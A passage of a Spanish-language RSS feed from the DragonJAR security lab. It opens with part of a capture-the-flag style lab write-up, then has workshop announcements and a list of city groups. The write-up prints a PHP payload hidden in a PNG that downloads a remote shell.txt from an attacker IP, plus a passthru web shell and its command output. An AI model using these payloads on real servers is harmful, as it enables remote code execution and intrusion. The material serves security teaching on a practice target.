<p>¿Y ahora qué?. Ahora queda percatarse de un par de detalles importantes. El primero, ¿cómo se llama el fichero que contiene la imagen?. En este caso, el fichero de imagen es: <strong>http://www.blindware.inc/_controlp/image.php</strong>, o dicho de otra forma, un fichero PHP se encarga de servir la imagen, de la que aún desconocemos su nombre y ubicación. ¿Cómo podemos saberla?. Pues haciendo uso del error que vimos en el nivel 3 dentro del fichero index.php, que permitía la lectura de ficheros. Con ese error leemos el contenido de image.php:</p>
<p><strong>&lt;? header(&#8220;Content-Type: image/png&#8221;); readfile(&#8220;01.png&#8221;); ?&gt;</strong></p>
<p>Por tanto, nuestro fichero subido sabemos que se llama &#8220;01.png&#8221; y que se encuentra en el mismo directorio de <strong>/_controlp/</strong> que el resto de datos. ¿Cómo podemos explotar el fichero con contenido PHP?. En este caso concreto, es cuando se puede apreciar, como la subida de ficheros maximiza el riesgo de otro de los fallos encontrados en el nivel 3. Si recordamos además de leer ficheros mediante el error localizado en index.php, podemos incluir ficheros para ser procesados por PHP desde un error con idéntica explotación localizado en login.php. Al hacerlo obtenemos como resultado de incluir nuestro fichero 01.png manipulado lo siguiente:</p>
<p>Como vemos, el contenido de la instrucción phpinfo() se muestra a continuación de los datos contenidos en la imagen. Esta información puede ser poco relevante, pero para la explotación efectiva únicamente hay que construir un exploit ligeramente más elaborado, que bien pudiera ser el que vamos a comentar a continuación.</p>
<p>El objetivo del exploit es conseguir crear una shell en PHP dentro de esta máquina. Para ello, el código que proponemos incluir dentro de la imagen es el siguiente:</p>
<p><strong>&lt;? copy(“http://ip/shell.txt”,”shell.php”); ?&gt;</strong></p>
<p>Vaya por delante que la explotación se puede realizar de muchas maneras. Nosotros por elegancia, siempre proponemos que el código a incluir en el exploit sea mínimo. En este caso, el exploit únicamente copia una shell remota localizada en shell.txt al servidor victima.</p>
<p>El contenido de shell.txt puede ser el siguiente:</p>
<p><strong>&lt;?<br />
header(“Content-Type: text/plain”);<br />
passthru($_GET[“cmd”);<br />
?&gt;</strong></p>
<p>El objetivo de este script es ejecutar el comando que pasemos como parámetr en la variable &#8220;cmd&#8221;. De tal forma, si ahora subimos la imagen con el primer código al servidor, y colocamos en la IP de un servidor web que usemos para el ataque el fichero “shell.txt”, debemos conseguir que este se copie al servidor y acceder a él desde la dirección http://www.blindware.inc/_controlp/shell.php</p>
<p>Aquí aparece un problema. Al acceder a esa URL veremos que no aparece nada, y es que hay un detalle importante siempre que subamos contenido ejecutable a un servidor. A priori no sabemos qué permisos serán necesarios para su ejecución, y la función copy lo más probable es que haya creado un fichero con permisos 644. Para ello podemos verificar qué permisos tienen los ficheros php de los que conocemos su existencia. En este caso los ficheros deben tener permisos 755. Por ello tenemos que modificar ligeramente el exploit a incluir dentro del fichero PNG al siguiente:</p>
<p><strong>&lt;? copy(“http://ip/shell.txt”,”shell.php”); chmod(“shell.php”,0755); ?&gt;</strong></p>
<p><strong>Nota:</strong> importante colocar un 0 delante del 755, sino no conseguiremos los permisos rwxr-xr-x</p>
<p>Hecho esto, tendremos acceso al sistema de forma remota y habremos superado el nivel, como muestran las siguientes URLs:</p>
<p><strong>http://www.blindware.inc/_controlp/shell.php?cmd=uname%20-a<br />
Linux sauron 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux</strong></p>
<p><strong>http://www.blindware.inc/_controlp/shell.php?cmd=id<br />
uid=500(blindware) gid=500(blindware) groups=500(blindware)</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HackTaller 02 en Medellín</title>
		<link>http://labs.dragonjar.org/hacktaller-02-en-medellin</link>
		<comments>http://labs.dragonjar.org/hacktaller-02-en-medellin#comments</comments>
		<pubDate>Fri, 29 Aug 2008 19:48:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=240</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El próximo sabado 30 de Agosto se llevará a cabo, el segundo HackTaller en la ciudad de Medellín con los miembros de la <a href="http://foro.dragonjar.us/" target="_blank">Comunidad DragonJAR</a> de esta ciudad.</p>
<p style="text-align: justify;">Para este HackTaller se realizará un Test de Intrusión de un Aplicativo Web. No se requiere un nivel de conocimientos avanzados en temas de seguridad, más si en informática en general, nociones básicas de seguridad, programación, linux y principalmente muchos deseos de aprender y compartir conocimiento.</p>
<p style="text-align: justify;">
<ul style="text-align: justify;">
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-part-i" target="_blank">Identificación de banners</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-i" target="_blank">Enumeración del objetivo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Ataques de fuerza bruta</a></li>
<li><a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Escaneo de vulnerabilidades</a></li>
<li><a href="http://www.dragonjar.org/programacion-segura" target="_blank">Análisis de código fuente</a></li>
<li>Injecciones de código y archivos</li>
<li>Explotación de vulnerabilidades</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">Se recomienda además leer los laboratorios que se han publicado en la página, donde se dan algunas definiciones importantes y necesarias para el HackTaller, y donde se hace uso de algunas herramientas imprescindibles para este tipo de prácticas.</p>
<p style="text-align: justify;"><span id="more-240"></span></p>
<ul style="text-align: justify;">
<li>BackTrack</li>
<li>NetCat</li>
<li>Nmap &#8211; Nmapfe</li>
<li>Hydra</li>
<li>etc</li>
</ul>
<p style="text-align: justify;">El lugar donde se realizará el HackTaller será en la sede oficial de los Laboratorios de la Comunidad DragonJAR, <a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a>.</p>
<p style="text-align: justify;"><strong>Hora:</strong> 2 pm<br />
<strong>Valor:</strong> 1.000 pesos la hora por el servicio de computadores disponibles (este precio es el acordado por el administrador del local comercial), el HackTaller se llevará en un mínimo de 5 horas.<br />
<strong>Materiales:</strong> Deseos de aprender y compartir</p>
<p style="text-align: justify;"><strong>Notas aclaratorias: </strong>El local comercial ofrece servicios de internet a usuarios regulares, por ello se estableció cobrar las horas en que haremos uso de las máquinas. En ningún momento, yo (<a href="http://foro.dragonjar.us/profiles/4v4t4r-u90.html" target="_blank">4v4t4r</a>), o la Comunidad DragonJAR busca algún tipo de lucro económico con este HackTaller.</p>
<p style="text-align: justify;">Las máquinas, con los sistemas virtualizados, la documentación y las memorias del HackTaller, quedan abiertas y disponibles al público en general para que realicen el laboratorio en los horarios de servicio del local comercial (Lunes a Sabado de 9 am a 10 pm).</p>
<p style="text-align: justify;"><strong>IMPORTANTE:</strong><br />
Es necesario realizar previa inscripción al HackTaller enviando un correo electrónico a 4v4t4r@gmail.com (nombre o nick, e-mail de contacto)</p>
<p style="text-align: justify;">Los cupos son bastante limitados así que para este primer HackTaller se tendrá preferencia para usuarios activos de la Comunidad. Además dependiendo de la cantidad de pre-inscritos se considerará hacer dos sesiones, una por la mañana con un grupo de usuarios y una por la tarde con otro grupo.</p>
<p style="text-align: justify;"><strong>Ubicación:</strong></p>
<p style="text-align: justify;">
<p style="text-align: center;"><a href="http://img528.imageshack.us/img528/6034/netmania2px8.jpg"><img class="aligncenter" src="http://img528.imageshack.us/img528/6034/netmania2px8.th.jpg" alt="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-02-en-medellin/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ciudades/Paises</title>
		<link>http://labs.dragonjar.org/ciudadespaises</link>
		<comments>http://labs.dragonjar.org/ciudadespaises#comments</comments>
		<pubDate>Mon, 18 Aug 2008 02:30:44 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=200</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Este será el espacio destinado para organizar y llevar a cabo los Laboratorios de Seguridad Informática DragonJAR por ciudades y paises.</p>
<p style="text-align: justify;">Los grupos se irán conformando desde el foro destinado para ello y aquí se plantearán los temas y se llevará registro de los mismos.</p>
<p style="text-align: justify;"><span id="more-200"></span><a href="http://comunidad.dragonjar.org/index.php?topic=275.0" target="_blank">Medellin</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=272.0" target="_blank">Pereira</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=159.0" target="_blank">Manizales</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=266.0" target="_blank">Popayán</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=267.0" target="_blank">Neiva</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=263.0" target="_blank">Cali</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=262.0" target="_blank">Bogotá</a></p>
<p style="text-align: justify;"><span id="msg_676" title="La gente de Ibagué que se reporte por favor en este post para organizar los grupos."><a href="http://comunidad.dragonjar.org/index.php?topic=271.0" target="_blank">Ibagué</a></span></p>
<p style="text-align: justify;"><span id="msg_663" title="La gente de Perú, que se reporte para realizar los laboratorios"><a href="http://comunidad.dragonjar.org/index.php?topic=261.0" target="_blank">Perú</a></span></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=274.0" target="_blank">Guatemala</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=270.0" target="_blank">Venezuela</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=265.0" target="_blank">Mexico</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=264.0" target="_blank">Argentina</a></p>
<p style="text-align: justify;">En la ciudad de Medellín se llevó a cabo el primer HackTaller de la Comunidad (<a href="http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii" target="_blank">Registro del primer HAckTaller en Medellín</a>). Así mismo en la ciudad de Cali varios usuarios de la comunidad llevaron con éxito un laboratorio de seguridad.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/ciudadespaises/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>

